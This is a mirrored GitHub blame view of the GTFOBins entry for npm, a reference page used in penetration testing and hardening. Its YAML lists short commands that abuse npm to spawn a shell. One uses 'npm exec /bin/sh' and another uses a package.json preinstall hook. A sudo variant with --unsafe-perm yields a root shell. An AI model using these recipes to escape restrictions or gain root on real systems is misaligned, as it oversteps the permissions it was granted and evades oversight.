1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00
GTFOBins.github.io/_gtfobins/npm.md

15 lines
348 B
Markdown
Raw Normal View History

2021-01-19 19:22:33 +01:00
---
functions:
shell:
2021-06-18 14:16:48 +02:00
- code: npm exec /bin/sh
2021-01-21 15:04:27 +01:00
- code: |
TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
npm -C $TF i
2021-01-19 19:22:33 +01:00
sudo:
2021-01-21 15:04:27 +01:00
- code: |
TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
sudo npm -C $TF --unsafe-perm i
2021-01-19 19:22:33 +01:00
---